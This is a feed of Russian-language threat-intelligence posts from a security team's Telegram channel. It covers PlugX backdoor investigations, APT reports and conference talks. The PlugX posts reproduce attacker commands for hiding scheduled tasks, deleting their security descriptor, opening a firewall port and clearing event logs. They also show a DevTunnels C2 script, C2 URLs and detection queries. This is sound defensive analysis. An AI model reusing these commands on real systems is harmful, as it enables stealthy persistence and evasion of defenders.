Operation Tartaria — PlugX 🤝 DevTunnels
В конце мая завершился PHDays Fest, в рамках которого на треке Defense команда 4RAYS рассказала про особенности работы планировщика задач Windows.
Практика команды PT ESC IR показывает, что закрепление через скрытые задачи — действительно достаточно редкий способ маскировки целевой атаки, но и в наших проектах мы периодически его встречаем. Расследуя инцидент в начале 2025 года, мы обнаружили скрытую задачу в дампе (триаже) на одном из узлов в скомпрометированной инфраструктуре. Для обнаружения подобных задач PT-Dumper проставляет ключи
Задача запускала
Зашифрованная нагрузка обновленного
Помимо запуска пассивного
Оказалось, что каждый раз, когда при старте
Таким образом атакующие, продвигаясь по сети, заражали системы пассивным бэкдором
Fun fact: при старте
Stay tuned!
#dfir #ti #apt #reverse #malware
@ptescalator
В конце мая завершился PHDays Fest, в рамках которого на треке Defense команда 4RAYS рассказала про особенности работы планировщика задач Windows.
Практика команды PT ESC IR показывает, что закрепление через скрытые задачи — действительно достаточно редкий способ маскировки целевой атаки, но и в наших проектах мы периодически его встречаем. Расследуя инцидент в начале 2025 года, мы обнаружили скрытую задачу в дампе (триаже) на одном из узлов в скомпрометированной инфраструктуре. Для обнаружения подобных задач PT-Dumper проставляет ключи
IsHiddenTask (удален SD — Security Denoscriptor) и IsMissingOnFS (XML отсутствует в файловой системе).{"TaskId":"[REDACTED]","TaskName":"7zup_Server","TaskRegistryPath":"\\7zup_Server","TaskAuthor":"[REDACTED]","IsHiddenTask":true,"IsMissingOnFS":true,"Action":{"Context":"Author","Properties":[{"Id":"","ActionName":"Execution","Arguments":"-remote up","Command":"C:\\PROGRA~1\\7-Zip\\7zUp.exe","WorkingDirectory":"","Flags":0}],"Version":3},"Triggers":[{"TriggerType":"Boot","Comment":"Boot"}],"CreatedTime":"2025-01-12T06:25:32Z","LastRunTime":"2025-06-18T18:17:23Z","LastErrorCode":"","Timeline":"2025-01-12T06:25:32Z"}
Задача запускала
7zUp.exe, который оказался уязвимым для техники DLL Side-Loading нативным отладчиком CDB.exe. При старте отладчик загружает вредоносную библиотеку dbgeng.dll, упакованную пакером VMProtect с кастомным названием секций. Зашифрованная нагрузка обновленного
PlugX доставляется в полезной нагрузке шеллкода manifest.txt, накрытого однобайтовым XOR. Аналогичная версия PlugX была описана в статье. Интересно отметить, что в полезной нагрузке затерты байты заголовков MZ и PE, хотя вся остальная структура заголовка сохранена.PlugX при старте записывает свой идентификатор в ключ реестра — HKLM\SOFTWARE\Clients\Mail\cf. Этот образец разделен на два логических модуля: один выполняет команды, другой является коннектором. Реализовано это посредством внедрения кода в процессы wksprt.exe и explorer.exe. Модули общаются через pipe \\.\PIPE\X<PID>. В найденных PlugX соединение с С2-сервером (0.0.0.0:53, 0.0.0.0:5355) было установлено через TCP, что указывает на более облегченную версию этого инструмента.Помимо запуска пассивного
PlugX мы обнаружили задачу, которая запускает исполняемый файл C:\Windows\System32\oobe\Setup.exe.<Exec>
<Command>C:\Windows\System32\oobe\Setup.exe</Command>
<Arguments>/ui</Arguments>
</Exec>
Оказалось, что каждый раз, когда при старте
Setup.exe возникает ошибка, запускается скрипт C:\Windows\Setup\Scripts\ErrorHandler.cmd. Подобная техника описана в блоге. В нашем случае атакующие запускали devNetwork.exe, который является туннелем DevTunnels.@echo off
taskkill /im devNetwork.exe /f
timeout /t 5 /nobreak >nul
C:\ProgramData\NetWorks\devNetwork.exe host [REDACTED]
timeout /t 2 /nobreak >nul
exit
Таким образом атакующие, продвигаясь по сети, заражали системы пассивным бэкдором
PlugX, а коммуникация с С2-сервером происходила с использованием легитимной утилиты DevTunnels.Fun fact: при старте
PlugX запускает кейлоггер, который является одним из плагинов и записывает нажатие клавиш в файл C:\Users\[REDACTED]\AppData\Roaming\ntuser.dat.LOG1 и буфер обмена в файл C:\Users\[REDACTED]\AppData\Roaming\ntuser.dat.LOG2. Изучив эти журналы, мы обнаружили ряд команд, которые выполняли атакующие в ходе развития атаки и продвижения по инфраструктуре:schtasks /create /RL HIGHEST /F /tn "7zup_Server" /tr "C:\PROGRA~1\7-Zip\7zUp.exe -remote up" /sc onstart /RU SYSTEM
schtasks /run /tn 7zup_Server
reg delete "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\7zup_Server" /v SD /f
del %SystemRoot%\System32\Tasks\7zup_Server /f
...
whoami /groups
netsh advfirewall firewall add rule name="WinDeviceSync" protocol=TCP dir=in localport=5355 action=allow
wevtutil.exe cl "Microsoft-Windows-TerminalServices-LocalSessionManager/Operational" /q:true /ow:true /backup:false
nslookup autodiscover.<yourdomain>.com
...
Stay tuned!
#dfir #ti #apt #reverse #malware
@ptescalator
🔥27❤14👀7👍4🌭1🎃1🆒1
Operation Tartaria Part 2
Помимо пассивного бэкдора
🫣 Как и в предыдущем случае, мы имеем дело с двухмодульным бэкдором. Коннектор внедряется в процесс
При успешном старте исследуемый образец подключается к блогу на
Помимо Yandex Disk, бэкдор поддерживает возможность общения через Microsoft Graph и Dropbox:
Общение происходит посредством чтения и перезаписи файлов в заданной папке в облаке. Сами файлы защищены шифром простой замены, а структура сообщений отличается в зависимости от выполняемой команды. Однако везде используется один и тот же
☝️ Примечательны следующие функции бэкдора:
• возможность получать шеллкоды и PE-файлы, внедряя их в процессы
• выполнение WMI-запросов для получения информации о системе:
• отключение всех сетевых соединений API WNetCancelConnection2W;
• изменение параметров входа в учетную запись или пароля через API NetUserSetInfo.
C2:
✅ Рекомендации:
• запрет DevTunnels с помощью групповой политики;
• поиск скрытых задач;
• поиск задач с параметром:
• поиск идентификатора
Happy hunting!
@ptescalator
#dfir #ti #apt #reverse #malware
Помимо пассивного бэкдора
PlugX, нам удалось обнаружить еще одну его версию, которая мимикрировала под запуск Яндекс Браузера.{"TaskId":"[REDACTED]","TaskName":"Yandexstart_Server","TaskRegistryPath":"\\Yandexstart_Server","TaskAuthor":"[REDACTED]","IsHiddenTask":false,"IsMissingOnFS":true,"Action":{"Context":"Author","Properties":[{"Id":"","ActionName":"Execution","Arguments":"-d restart","Command":"C:\\PROGRA~1\\Yandex\\browser\\Yandex.exe","WorkingDirectory":"","Flags":0}],"Version":3},"Triggers":[{"TriggerType":"Boot","Comment":"Boot"}],"CreatedTime":"2024-12-11T01:11:34Z","LastRunTime":"2025-06-23T06:37:17Z","LastErrorCode":1223,"Timeline":"2024-12-11T01:11:34Z"}
Yandex.exe оказался уязвимым для техники DLL Side-Loading, выполняемой утилитой Umdh.exe (User-Mode Dump Heap), которая подгружает вредоносную библиотеку dbghelp.dll под пакером VMProtect с кастомным названием секций; нагрузка хранится в файле desktop.ini.🫣 Как и в предыдущем случае, мы имеем дело с двухмодульным бэкдором. Коннектор внедряется в процесс
choice.exe, а интерпретатор команд — в mspaint.exe. Процессы общаются через pipe .\\PIPE\\[%d].При успешном старте исследуемый образец подключается к блогу на
livejournal.com (скриншот 1) и на ok.ru (скриншоты 2-3). Далее парсит содержимое ответа и ищет последовательность, которая начинается с R241223 и заканчивается на R251223 и внутри которой находится зашифрованный токен для API Yandex Disk. Далее коммуникация бэкдора происходит через API. Аналогичный образец был описан в «CloudSorcerer: новая APT-угроза, нацеленная на российские государственные организации».Помимо Yandex Disk, бэкдор поддерживает возможность общения через Microsoft Graph и Dropbox:
cloud-api.yandex.net
graph.microsoft.com
content.dropboxapi.com
Общение происходит посредством чтения и перезаписи файлов в заданной папке в облаке. Сами файлы защищены шифром простой замены, а структура сообщений отличается в зависимости от выполняемой команды. Однако везде используется один и тот же
header:0 2 6 10 14
| command | msg size | short answer | ticketcount |
☝️ Примечательны следующие функции бэкдора:
• возможность получать шеллкоды и PE-файлы, внедряя их в процессы
TSTheme.exe и msiexec.exe;• выполнение WMI-запросов для получения информации о системе:
SELECT * FROM Win32_OperatingSystem
SELECT * FROM Win32_TimeZone
SELECT * FROM Win32_ComputerSystem
SELECT * FROM Win32_QuickFixEngineering
• отключение всех сетевых соединений API WNetCancelConnection2W;
• изменение параметров входа в учетную запись или пароля через API NetUserSetInfo.
C2:
devtunnels.ms
https://anddes.livejournal.com/511.html
https://ok.ru/profile/587950172233/statuses/157023463517001
✅ Рекомендации:
• запрет DevTunnels с помощью групповой политики;
• поиск скрытых задач;
• поиск задач с параметром:
reg query "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks" /s | findstr "2D00720065006D006F0074006500200075007000"
reg query "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks" /s | findstr "2d00640020007200650073007400610072007400"
• поиск идентификатора
PlugX:reg query HKEY_LOCAL_MACHINE\SOFTWARE\Clients\Mail\cf
Happy hunting!
@ptescalator
#dfir #ti #apt #reverse #malware
❤17🔥17👍11⚡3🤡2🍌1
Во Всемирный день кошек самое время спросить: какие из них вам нравятся? 😊
Anonymous Poll
22%
cat ./passwords.txt 🐈
16%
hashcat -m 0 -a 0 hash.txt rockyou.txt 🐱
20%
mimiKATz 🐱
2%
zcat *.log.gz 🐱
16%
netcat 🐈
11%
suriCATa 😺
2%
Dark Caracal 😺
3%
Charming Kitten 😺
1%
Golden RAT (не люблю котов) 🐀
7%
HellHounds (я собачник) 🕺
😎8❤6👾5
Группа киберразведки PT ESC представила обзор кибератак за II квартал 2025 года ✍️
В отчете рассмотрены наиболее показательные атаки на ИТ-инфраструктуры российских госорганизаций и частных компаний.
🦉 За указанный период зафиксирована активность Team46, TA Tolik, Black Owl и других.
📩 Фишинговые кампании шли непрерывно от имени государственных структур и регуляторов. Использовались:
• Архивы с вредоносной нагрузкой, название и тема которых совпадали с содержанием письма;
• Документы с встроенными эксплойтами под известные уязвимости в офисных пакетах и системах ЭДО;
• Ссылки на облачные хранилища и файлообменники для обхода почтовых фильтров.
В ряде случаев применялась модель «отложенной доставки» полезной нагрузки после установления переписки (spear-phishing + социальная инженерия) и имитация деловой коммуникации для принуждения к открытию вложений.
💥 Ключевые тенденции:
1. Деструктивное применение шифровальщиков. Black Owl использует шифрование и вайпинг для максимального нарушения работоспособности инфраструктуры.
2. Монетизация через вымогательство. Werewolves и DarkGaboon задействуют шифровальщики в рамках выкупных схем, нередко после предварительной разведки и утечки данных (двойное давление).
3. Шпионаж с упором на скрытность. Cloud Atlas и PhantomCore нацелены на долговременное присутствие, сбор внутренних документов и учетных данных; применяются многоступенчатые загрузчики и приемы living-off-the-land для снижения заметности.
Полный отчет — в нашем блоге⬅️
#TI #APT #Malware #Phishing
@ptescalator
В отчете рассмотрены наиболее показательные атаки на ИТ-инфраструктуры российских госорганизаций и частных компаний.
🦉 За указанный период зафиксирована активность Team46, TA Tolik, Black Owl и других.
📩 Фишинговые кампании шли непрерывно от имени государственных структур и регуляторов. Использовались:
• Архивы с вредоносной нагрузкой, название и тема которых совпадали с содержанием письма;
• Документы с встроенными эксплойтами под известные уязвимости в офисных пакетах и системах ЭДО;
• Ссылки на облачные хранилища и файлообменники для обхода почтовых фильтров.
В ряде случаев применялась модель «отложенной доставки» полезной нагрузки после установления переписки (spear-phishing + социальная инженерия) и имитация деловой коммуникации для принуждения к открытию вложений.
💥 Ключевые тенденции:
1. Деструктивное применение шифровальщиков. Black Owl использует шифрование и вайпинг для максимального нарушения работоспособности инфраструктуры.
2. Монетизация через вымогательство. Werewolves и DarkGaboon задействуют шифровальщики в рамках выкупных схем, нередко после предварительной разведки и утечки данных (двойное давление).
3. Шпионаж с упором на скрытность. Cloud Atlas и PhantomCore нацелены на долговременное присутствие, сбор внутренних документов и учетных данных; применяются многоступенчатые загрузчики и приемы living-off-the-land для снижения заметности.
Полный отчет — в нашем блоге
#TI #APT #Malware #Phishing
@ptescalator
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥26👍12👌9❤4🤯1
Через фантомные выплаты к конфиденциальным данным 🫰
В июне мы выпустили статью про обнаруженные Exchange-кейлоггеры. На тот момент было выявлено девять компаний-жертв в России, но никакой атрибуции тогда мы не провели.
В июле этого года мы совершили прыжок во времени и вернулись в декабрь 2024-го. Исследование зафиксированной тогда атаки позволило связать ряд обнаруженных кейлоггеров с группировкой PhantomCore👻 . При этом общее количество жертв на территории России увеличилось: в июне этого года их было девять, а в августе — уже 18.
Общая статистика такова:
• 10 компаний из общего числа взломанных организаций — жертвы группировки PhantomCore.
• Всего было обнаружено более 5000 строк с данными «логин — пароль — дата входа», которые получили злоумышленники.
• Прыжок во времени позволил нам найти образец ВПО PhantomDL v3, который использовался в атаках с мимикрией под военную юриспруденцию.
Анализ временного прыжка вы можете найти в нашем новом исследовании на Хабре.
P.S.: с PhantomCore мы не закончили. Следите за новостями🔜
#TI #APT #Malware
@ptescalator
В июне мы выпустили статью про обнаруженные Exchange-кейлоггеры. На тот момент было выявлено девять компаний-жертв в России, но никакой атрибуции тогда мы не провели.
В июле этого года мы совершили прыжок во времени и вернулись в декабрь 2024-го. Исследование зафиксированной тогда атаки позволило связать ряд обнаруженных кейлоггеров с группировкой PhantomCore
Общая статистика такова:
• 10 компаний из общего числа взломанных организаций — жертвы группировки PhantomCore.
• Всего было обнаружено более 5000 строк с данными «логин — пароль — дата входа», которые получили злоумышленники.
• Прыжок во времени позволил нам найти образец ВПО PhantomDL v3, который использовался в атаках с мимикрией под военную юриспруденцию.
Анализ временного прыжка вы можете найти в нашем новом исследовании на Хабре.
P.S.: с PhantomCore мы не закончили. Следите за новостями
#TI #APT #Malware
@ptescalator
Please open Telegram to view this post
VIEW IN TELEGRAM
👍12❤8🔥8
PTESCALATOR_9.png
10.7 MB
Вместо пятничного опроса — 8K WALLPAPERS BY @PTESCALATOR
Если пост соберет больше одного лайка, будем делать подборки регулярно
❤65👍34🔥18😁4💩4👎2
Phantomные боли 👻
В мае департамент Threat Intelligence экспертного центра безопасности Positive Technologies (PT ESC TI) обнаружил новую масштабную кампанию кибершпионажа APT-группировки PhantomCore в отношении критической инфраструктуры России.
Внешний периметр кибератаки и вредоносный арсенал были одновременно описаны российскими и зарубежными вендорами кибербезопасности. Однако группа киберразведки PT ESC TI сосредоточилась на более глубоком исследовании угрозы, в рамках которого удалось:
🖥 обнаружить ключевую инфраструктуру: взломанные российские сайты, фишинговые ресурсы с FakeCaptcha, payload-хабы, MeshCentral-серверы, SSH-туннели, панель управления Phantom;
👾 изучить и покрыть детектирующими правилами обновленный вредоносный арсенал: от популярных в киберпреступной среде opensource-утилит (RSocx, MeshAgent, RClone, XenArmor Password Recovery) и обновленных версий известных инструментов из личного арсенала (PhantomRAT) — до ранее не встречавшихся кастомных образцов: PhantomRShell, PhantomProxyLite, PhantomTaskShell, PhantomStealer;
🥷 изучить TTP и kill chain кибератак, подробно описать процедуры, выполняемые на зараженных хостах;
🌐 изучить географию, хронологию, характеристики и масштаб кибератак: более 180 заражений на территории России с мая по июль, 56% которых пришлись на 30 июня; 49 хостов до сих пор остаются под контролем группировки; среднее время нахождения хакеров в скомпрометированной сети — 24 дня, максимальное — 78 дней;
📞 идентифицировать и уведомить жертв из числа российских госорганов, научно-исследовательских институтов, предприятий оборонно-промышленного комплекса, судостроительной отрасли, химической, горнодобывающей и обрабатывающей промышленности, а также IT-компаний.
Кроме того, группе киберразведки PT ESC TI удалось обнаружить ответвление группировки, не входящее в основное звено. Оно состояло из низкоквалифицированных специалистов, подобранных в русскоязычных игровых Discord-сообществах, и было организовано в качестве собственного киберкриминального стартапа одним из членов основного костяка PhantomCore, имевшим доступ к исходникам кастомных инструментов.
🫱 Полный отчет — в нашем блоге.
#TI #APT
@ptescalator
В мае департамент Threat Intelligence экспертного центра безопасности Positive Technologies (PT ESC TI) обнаружил новую масштабную кампанию кибершпионажа APT-группировки PhantomCore в отношении критической инфраструктуры России.
Внешний периметр кибератаки и вредоносный арсенал были одновременно описаны российскими и зарубежными вендорами кибербезопасности. Однако группа киберразведки PT ESC TI сосредоточилась на более глубоком исследовании угрозы, в рамках которого удалось:
🖥 обнаружить ключевую инфраструктуру: взломанные российские сайты, фишинговые ресурсы с FakeCaptcha, payload-хабы, MeshCentral-серверы, SSH-туннели, панель управления Phantom;
👾 изучить и покрыть детектирующими правилами обновленный вредоносный арсенал: от популярных в киберпреступной среде opensource-утилит (RSocx, MeshAgent, RClone, XenArmor Password Recovery) и обновленных версий известных инструментов из личного арсенала (PhantomRAT) — до ранее не встречавшихся кастомных образцов: PhantomRShell, PhantomProxyLite, PhantomTaskShell, PhantomStealer;
🥷 изучить TTP и kill chain кибератак, подробно описать процедуры, выполняемые на зараженных хостах;
🌐 изучить географию, хронологию, характеристики и масштаб кибератак: более 180 заражений на территории России с мая по июль, 56% которых пришлись на 30 июня; 49 хостов до сих пор остаются под контролем группировки; среднее время нахождения хакеров в скомпрометированной сети — 24 дня, максимальное — 78 дней;
📞 идентифицировать и уведомить жертв из числа российских госорганов, научно-исследовательских институтов, предприятий оборонно-промышленного комплекса, судостроительной отрасли, химической, горнодобывающей и обрабатывающей промышленности, а также IT-компаний.
Кроме того, группе киберразведки PT ESC TI удалось обнаружить ответвление группировки, не входящее в основное звено. Оно состояло из низкоквалифицированных специалистов, подобранных в русскоязычных игровых Discord-сообществах, и было организовано в качестве собственного киберкриминального стартапа одним из членов основного костяка PhantomCore, имевшим доступ к исходникам кастомных инструментов.
🫱 Полный отчет — в нашем блоге.
#TI #APT
@ptescalator
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥24❤13👍13👏1
Forwarded from Positive Events
🗣 Каникулы заканчиваются, и наши эксперты возвращаются к публичным выступлениям
Основная часть докладов состоится на OFFZONE, где мы будем говорить об уязвимостях в различных продуктах и системах, об APT-группировках, реверс-инжиниринге, ИИ и изменениях ландшафта киберугроз.
➡️ 21 августа, 16:00, доклад «Особенности задач в продукте класса ПАК» на конференции аналитиков «Контур» в Санкт-Петербурге
Об особенностях работы системных аналитиков на производстве программно-аппаратных комплексов, возникающих задачах и встречающихся сложностях на примере PT NGFW расскажет Наталья Фролова, руководитель группы системного анализа.
OFFZONE
➡️ 21 августа, 13:00, доклад «Забираем секреты FreeIPA. И другие атаки»
Тем, как удаленно забрать из FreeIPA хеши паролей и посмотреть на центр сертификации, поделится Михаил Сухов, старший специалист red team R&D. Кроме того, он подробно разберет уязвимость CVE-2025-4404.
➡️ 21 августа, 13:20, доклад «LLM для автоматизации ИБ экспертизы: обнаружение вредоносного кода»
Как при помощи LLM построить пайплайн для обнаружения вредоносного кода и автоматизировать разметку данных, если она отсутствует, поделится в своем докладе Максим Митрофанов, руководитель группы анализа безопасности приложений.
➡️ 21 августа, 15:00, доклад «Баг ценой в жизнь: разбираем уязвимость в Android, блокирующую связь в чрезвычайной ситуации»
Залезем «под капот» Andorid и узнаем, какие ключевые недостатки в реализации политики глобальных ограничений приводят к блокировке функции вызова экстренных служб. Алена Склярова, старший исследователь безопасности ОС Android, посмотрит на уязвимость в действии и проверит, действительно ли патч устраняет проблему.
➡️ 22 августа, 11:00, доклад «Как выпасть из окна, или Все, что вы хотели знать про IOMMU в Windows»
Поговорим об особенностях DMA-атак на современные системы. Доклад Александра Занегина и Юрия Мищенко — первый полный обзор работы Windows IOMMU с низкоуровневыми подробностями от реверса и экспериментов вместо документации.
➡️ 22 августа, 12:00, доклад BootROM Busted: Renesas MCU inside
О том, как они смогли обнаружить несколько уязвимостей и успешно атаковать c помощью glitch-атак расскажут наши эксперты Дмитрий Верещак и Юрий Васин.
➡️ 22 августа, 13:00, доклад «Погребено в $LogFile: эксплуатация 20-летней уязвимости в NTFS»
Об обнаружении и эксплуатации ранее неизвестной уязвимости, связанной с повышением привилегий, в файловой системе NTFS (CVE‑2025‑49689), которая более 20 лет оставалась вне поля зрения разработчиков и исследователей, расскажет Сергей Тарасов, руководитель группы анализа уязвимостей в PT ESC.
➡️ 22 августа, 14:30, доклад «Гадание на GOFFEEйной гуще: актуальные инструменты и особенности группировки GOFFEE в атаках на Россию»
Вы узнаете об активности группировки за последний год и ее атаках на промышленный и государственный секторы России. Клим Галкин и Варвара Колоскова, специалисты групп киберразведки и исследования сложных угроз, подробнее расскажут об арсенале и инфраструктуре GOFFEE.
➡️ 22 августа, 16:30, дискуссия «Ландшафт киберугроз России в 2025 году»
Денис Кувшинов, руководитель департамента threat intelligence PT ESC, вместе с представителями компаний, специализирующихся на кибербезопасности, поговорит об изменении ландшафта угроз в 2025 году и обсудят тренды.
➡️ 22 августа, 17:00, доклад «“Слушай и бей” — взламываем устройства с помощью осциллографа и транзистора»
В докладе Алексей Шалпегин на наглядных примерах разберет векторы атак на современные микроконтроллеры, а также инструменты злоумышленников.
➡️ 25 августа, 17:30, панельная дискуссия «Чем ux-редактор отличается от техписа» на WriteConf
Представители крупных ИТ-компаний обсудят, какие сходства и различия имеют эти две профессии. От нас в дискуссии участвует Анастасия Московкина, руководитель департамента информационной поддержки.
Не пропустите интересные вам доклады и дискуссии, если собираетесь на любую из конференций 😉
@Positive_Technologies
Основная часть докладов состоится на OFFZONE, где мы будем говорить об уязвимостях в различных продуктах и системах, об APT-группировках, реверс-инжиниринге, ИИ и изменениях ландшафта киберугроз.
Об особенностях работы системных аналитиков на производстве программно-аппаратных комплексов, возникающих задачах и встречающихся сложностях на примере PT NGFW расскажет Наталья Фролова, руководитель группы системного анализа.
OFFZONE
Тем, как удаленно забрать из FreeIPA хеши паролей и посмотреть на центр сертификации, поделится Михаил Сухов, старший специалист red team R&D. Кроме того, он подробно разберет уязвимость CVE-2025-4404.
Как при помощи LLM построить пайплайн для обнаружения вредоносного кода и автоматизировать разметку данных, если она отсутствует, поделится в своем докладе Максим Митрофанов, руководитель группы анализа безопасности приложений.
Залезем «под капот» Andorid и узнаем, какие ключевые недостатки в реализации политики глобальных ограничений приводят к блокировке функции вызова экстренных служб. Алена Склярова, старший исследователь безопасности ОС Android, посмотрит на уязвимость в действии и проверит, действительно ли патч устраняет проблему.
Поговорим об особенностях DMA-атак на современные системы. Доклад Александра Занегина и Юрия Мищенко — первый полный обзор работы Windows IOMMU с низкоуровневыми подробностями от реверса и экспериментов вместо документации.
О том, как они смогли обнаружить несколько уязвимостей и успешно атаковать c помощью glitch-атак расскажут наши эксперты Дмитрий Верещак и Юрий Васин.
Об обнаружении и эксплуатации ранее неизвестной уязвимости, связанной с повышением привилегий, в файловой системе NTFS (CVE‑2025‑49689), которая более 20 лет оставалась вне поля зрения разработчиков и исследователей, расскажет Сергей Тарасов, руководитель группы анализа уязвимостей в PT ESC.
Вы узнаете об активности группировки за последний год и ее атаках на промышленный и государственный секторы России. Клим Галкин и Варвара Колоскова, специалисты групп киберразведки и исследования сложных угроз, подробнее расскажут об арсенале и инфраструктуре GOFFEE.
Денис Кувшинов, руководитель департамента threat intelligence PT ESC, вместе с представителями компаний, специализирующихся на кибербезопасности, поговорит об изменении ландшафта угроз в 2025 году и обсудят тренды.
В докладе Алексей Шалпегин на наглядных примерах разберет векторы атак на современные микроконтроллеры, а также инструменты злоумышленников.
Представители крупных ИТ-компаний обсудят, какие сходства и различия имеют эти две профессии. От нас в дискуссии участвует Анастасия Московкина, руководитель департамента информационной поддержки.
Не пропустите интересные вам доклады и дискуссии, если собираетесь на любую из конференций 😉
@Positive_Technologies
Please open Telegram to view this post
VIEW IN TELEGRAM
❤7🔥5👍4⚡2
Гадание на Goffeeйной гуще: актуальные инструменты и особенности группировки Goffee в атаках на Россию ☕️
В течение 2024-2025 годов эксперты TI-департамента пристально следят за активностью группировки Goffee. За этот период, совместно с IR-командой, при расследовании инцидентов мы наблюдали обновление арсенала и использование новых векторов атаки.
🕵️ Нам удалось получить ранее неизвестные сэмплы — руткит, самописные инструменты для туннелирования трафика и другие. Изучение сетевой инфраструктуры позволило выявить паттерны, которые с высокой уверенностью позволяют атрибутировать новые семплы к активности группировки Goffee.
👽 О том, какие особенности в их инфраструктуре мы выделили, какой арсенал использует группировка на данный момент и почему исследование атак «гофи» — это поиск Goffeeйного зерна в инфраструктуре жертвы, вы можете узнать в нашей новой статье.
#TI #IR #APT #Malware
@ptescalator
В течение 2024-2025 годов эксперты TI-департамента пристально следят за активностью группировки Goffee. За этот период, совместно с IR-командой, при расследовании инцидентов мы наблюдали обновление арсенала и использование новых векторов атаки.
#TI #IR #APT #Malware
@ptescalator
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥18❤10👌5⚡2
Какой доклад на OFFZONE от экспертов Позитива вам зашел больше всего? 🧐
Anonymous Poll
9%
Забираем секреты FreeIPA. И другие атаки 😎
7%
LLM для автоматизации ИБ-экспертизы: обнаружение вредоносного кода 🤖
4%
Баг ценой в жизнь: разбираем уязвимость в Android, блокирующую связь в чрезвычайной ситуации 📱
3%
Как выпасть из окна, или Все, что вы хотели знать про IOMMU в Windows 🪟
2%
BootROM Busted: Renesas MCU inside 💀
11%
Погребено в $LogFile: эксплуатация 20-летней уязвимости в NTFS 😱
13%
Гадание на GOFFEEйной гуще: актуальные инструменты и особенности GOFFEE в атаках на Россию ☕️
5%
«Слушай и бей» — взламываем устройства с помощью осциллографа и транзистора 🔨
68%
Не был на OFFZONE, жду записи 🗿
👍11❤6🔥6😁3